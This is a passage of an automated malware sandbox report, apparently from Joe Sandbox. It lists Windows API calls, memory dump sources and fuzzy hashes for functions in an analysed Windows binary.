                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00F6B69A,?,00008000), ref: 00F6BA8B
                                                                                                                                                                                                                                                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00F6B69A,?,00008000), ref: 00F6BAB0
                                                                                                                                                                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,00F6B69A,?,00008000), ref: 00F6BABA
                                                                                                                                                                                                                                                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,00F6B69A,?,00008000), ref: 00F6BAED
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CounterPerformanceQuerySleep
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2875609808-0
                                                                                                                                                                                                                                                                                        • Opcode ID: c4d8c2c521208df3f23b5ac6f9e08928c72aa3e006fd984612589b2bf01bacd7
                                                                                                                                                                                                                                                                                        • Instruction ID: 307a5201899b66e149d63bdd741c73050886a8f2698c97bcc06b5cd28f422b16
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c4d8c2c521208df3f23b5ac6f9e08928c72aa3e006fd984612589b2bf01bacd7
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2E115B32C0162DEBDF00EFE5E9497EEBB78BF09711F104096D941B2180CB789691EBA5
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00F9888E
                                                                                                                                                                                                                                                                                        • ScreenToClient.USER32(?,?), ref: 00F988A6
                                                                                                                                                                                                                                                                                        • ScreenToClient.USER32(?,?), ref: 00F988CA
                                                                                                                                                                                                                                                                                        • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00F988E5
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 357397906-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 98343e534986e7026bdcd081a053b4aad95701ccff7097da86fb4bc3bd69fcd2
                                                                                                                                                                                                                                                                                        • Instruction ID: fe57c55a7c8226ccfeee4ff0e3853a3e425d0fbddb51061416e38c2b930a36b2
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 98343e534986e7026bdcd081a053b4aad95701ccff7097da86fb4bc3bd69fcd2
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1F1110B9D0020DAFDB41DFA8C884AEEBBB9FB09314F508166E915E2210D735AA55DF50
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00F63712
                                                                                                                                                                                                                                                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00F63723
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00F6372A
                                                                                                                                                                                                                                                                                        • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00F63731
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2710830443-0
                                                                                                                                                                                                                                                                                        • Opcode ID: b5f36498b1ad8f8c6521f8c9b21295f07a39f1fcf7f7a0957cff028468f178d0
                                                                                                                                                                                                                                                                                        • Instruction ID: a267bc7cffe8dd0e10711f673af0a9925319bee96a5749f13233a5413db8fb9d
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b5f36498b1ad8f8c6521f8c9b21295f07a39f1fcf7f7a0957cff028468f178d0
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 11E012B2905228BBEB2057A29D4DFEB7F6CDF56BB1F600016F505D2090DAA5C940E6B1
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F01F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00F01F87
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F01F2D: SelectObject.GDI32(?,00000000), ref: 00F01F96
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F01F2D: BeginPath.GDI32(?), ref: 00F01FAD
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F01F2D: SelectObject.GDI32(?,00000000), ref: 00F01FD6
                                                                                                                                                                                                                                                                                        • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00F992E3
                                                                                                                                                                                                                                                                                        • LineTo.GDI32(?,?,?), ref: 00F992F0
                                                                                                                                                                                                                                                                                        • EndPath.GDI32(?), ref: 00F99300
                                                                                                                                                                                                                                                                                        • StrokePath.GDI32(?), ref: 00F9930E
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1539411459-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 3456c5eee00936af7dfae4bbe0a1cde3e66159f90d759888cfacbd6846efe971
                                                                                                                                                                                                                                                                                        • Instruction ID: f04760a72a04bd69d9b9a0b1b9686574bedb36e4a7f744090b79f48e845900d1
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3456c5eee00936af7dfae4bbe0a1cde3e66159f90d759888cfacbd6846efe971
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 65F03A32006259BAEB125F64AC0AFCA3B5AAF0A320F148002FA15210E1C7B55562BBE5
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetSysColor.USER32(00000008), ref: 00F021BC
                                                                                                                                                                                                                                                                                        • SetTextColor.GDI32(?,?), ref: 00F021C6
                                                                                                                                                                                                                                                                                        • SetBkMode.GDI32(?,00000001), ref: 00F021D9
                                                                                                                                                                                                                                                                                        • GetStockObject.GDI32(00000005), ref: 00F021E1
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Color$ModeObjectStockText
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 4037423528-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 9d44e2c68c353669c8d3ca296352a066c6d2a5f70305a3478e4ee027b895b539
                                                                                                                                                                                                                                                                                        • Instruction ID: 7cf2b0948d608305728b80b5c372393d8249fe3a49edbd1b6adc8b9b0893724c
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9d44e2c68c353669c8d3ca296352a066c6d2a5f70305a3478e4ee027b895b539
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B1E09B32640244AEEB215F74BC0DBE87F11AB11335F14821BF7F5540E0C7718680BB10
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 00F5EC36
                                                                                                                                                                                                                                                                                        • GetDC.USER32(00000000), ref: 00F5EC40
                                                                                                                                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00F5EC60
                                                                                                                                                                                                                                                                                        • ReleaseDC.USER32(?), ref: 00F5EC81
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2889604237-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 1329076fe4b5865ae383fa8686dc8d0d455ae08cf90faa6a1137f3bf821cc9f4
                                                                                                                                                                                                                                                                                        • Instruction ID: f3e34fa27820fff91d58afd4bbe0e339bc866d2cac87369b20c495604a6722e3
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1329076fe4b5865ae383fa8686dc8d0d455ae08cf90faa6a1137f3bf821cc9f4
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D8E01A76C00208DFCB409FA0D908A5DBBB1EB48311F20840AE90AE3250C7385941FF00
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 00F5EC4A
                                                                                                                                                                                                                                                                                        • GetDC.USER32(00000000), ref: 00F5EC54
                                                                                                                                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00F5EC60
                                                                                                                                                                                                                                                                                        • ReleaseDC.USER32(?), ref: 00F5EC81
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
• Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2889604237-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 79f30cdba3e1f55211d187543b20a77a03497533080d2ce98df31c2ec8535c23
                                                                                                                                                                                                                                                                                        • Instruction ID: 9893406fb8cd1ca4b5584ab4b1e516332ad5cc1c2e2e3481f34bb5eab0411198
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 79f30cdba3e1f55211d187543b20a77a03497533080d2ce98df31c2ec8535c23
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 44E046B6C00208EFCF409FA0D908A5DBBB1FB48310F20840AF80AE32A0CB386901FF00
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F041EA: _wcslen.LIBCMT ref: 00F041EF
                                                                                                                                                                                                                                                                                        • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00F75919
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
• Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Connection_wcslen
                                                                                                                                                                                                                                                                                        • String ID: *$LPT
                                                                                                                                                                                                                                                                                        • API String ID: 1725874428-3443410124
                                                                                                                                                                                                                                                                                        • Opcode ID: 61def2d25ca7492cd93bbff973b22fdb5814c9458ff8a7ea534b897af6bd7f01
                                                                                                                                                                                                                                                                                        • Instruction ID: f61e3988334fe5880c6b715c336272890fa1af03659ba3d4c105e760dfef72f3
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 61def2d25ca7492cd93bbff973b22fdb5814c9458ff8a7ea534b897af6bd7f01
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 15918C75A00604DFDB14CF54C884EA9BBF1AF44714F18C09AE8495F3A2C775EE86EB92
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • __startOneArgErrorHandling.LIBCMT ref: 00F2E67D
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
• Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorHandling__start
                                                                                                                                                                                                                                                                                        • String ID: pow
                                                                                                                                                                                                                                                                                        • API String ID: 3213639722-2276729525
                                                                                                                                                                                                                                                                                        • Opcode ID: 6663be8279f0f6ebe6cdf4a7f93e0ae6b23e054c5fe3ba8315fc86992309a22e
                                                                                                                                                                                                                                                                                        • Instruction ID: bff27cf51bb9ef38a90aae91f654fa21fa851046f7faed6d6c6b23fa058dcbbf
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6663be8279f0f6ebe6cdf4a7f93e0ae6b23e054c5fe3ba8315fc86992309a22e
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 89518EA2E2930686CB157714ED0136A7FA0EB507B0F304D58F095463E8DF3D8D97BA46
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
• Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID: #
                                                                                                                                                                                                                                                                                        • API String ID: 0-1885708031
                                                                                                                                                                                                                                                                                        • Opcode ID: b456b830014b55d86de7e73c7e62da537de762cc2221860089e7a3697489f7f0
                                                                                                                                                                                                                                                                                        • Instruction ID: adf3d580e1d03250bccc68ba0bdb11ea6b7dcaffa2de75c3676bccc3a4d65100
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b456b830014b55d86de7e73c7e62da537de762cc2221860089e7a3697489f7f0
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CD511131906246DFCB25DF28C481AFA7BA0EF16360F644055ED91AB2D0DB389D87FB61
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • Sleep.KERNEL32(00000000), ref: 00F1F6DB
                                                                                                                                                                                                                                                                                        • GlobalMemoryStatusEx.KERNEL32(?), ref: 00F1F6F4
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
• Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: GlobalMemorySleepStatus
                                                                                                                                                                                                                                                                                        • String ID: @
                                                                                                                                                                                                                                                                                        • API String ID: 2783356886-2766056989
                                                                                                                                                                                                                                                                                        • Opcode ID: 503a5a80ba717af3cd2327b89c928be5a1b6de3633d63066f5d6921db92e95ae
                                                                                                                                                                                                                                                                                        • Instruction ID: 25b6e3568e1de70e2c3af50e5ecf21c84313c54b2aa9d6fa9f75c01c968ad7a7
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 503a5a80ba717af3cd2327b89c928be5a1b6de3633d63066f5d6921db92e95ae
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 69515771918748ABD320AF14DC86BAFBBE8FF84340F818C5DF1D9411A1DB358529EB66
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
• Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: BuffCharUpper_wcslen
                                                                                                                                                                                                                                                                                        • String ID: CALLARGARRAY
                                                                                                                                                                                                                                                                                        • API String ID: 157775604-1150593374
                                                                                                                                                                                                                                                                                        • Opcode ID: 369efde80de800e2df4631b0723446c2e3a8b799cb9f4f6d1e595a914e7259bc
                                                                                                                                                                                                                                                                                        • Instruction ID: abf047b53546880df05b571e4a150b95d9b6ea75cb87b62059a4c67367513f2b
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 369efde80de800e2df4631b0723446c2e3a8b799cb9f4f6d1e595a914e7259bc
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1041CF31E002199FCF00EFA8C8859EEBBB5FF59364F104169E405E7252E7749D81EBA0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F7DB75
                                                                                                                                                                                                                                                                                        • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00F7DB7F
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
• Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CrackInternet_wcslen
                                                                                                                                                                                                                                                                                        • String ID: |
                                                                                                                                                                                                                                                                                        • API String ID: 596671847-2343686810
                                                                                                                                                                                                                                                                                        • Opcode ID: ebc1a0a238d88709d6a7892de84254e1c07405b61b4d446dcee02534f8d4e26c
                                                                                                                                                                                                                                                                                        • Instruction ID: 4ef7e2bc2df7e1f69d80d3f22f12c197b70cad46ebc9e6f749feac6d719800a1
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ebc1a0a238d88709d6a7892de84254e1c07405b61b4d446dcee02534f8d4e26c
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A2316F72C01119ABCF05DFA4CC85EEEBFB9FF04354F504029F815A6162EB759906EB51
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • DestroyWindow.USER32(?,?,?,?), ref: 00F940BD
                                                                                                                                                                                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00F940F8
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
• Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Window$DestroyMove
                                                                                                                                                                                                                                                                                        • String ID: static
                                                                                                                                                                                                                                                                                        • API String ID: 2139405536-2160076837
                                                                                                                                                                                                                                                                                        • Opcode ID: 6c5e0150e4ca59feb96b241d7b01aee8d68413928e5ff92b2d452272f864c4bc
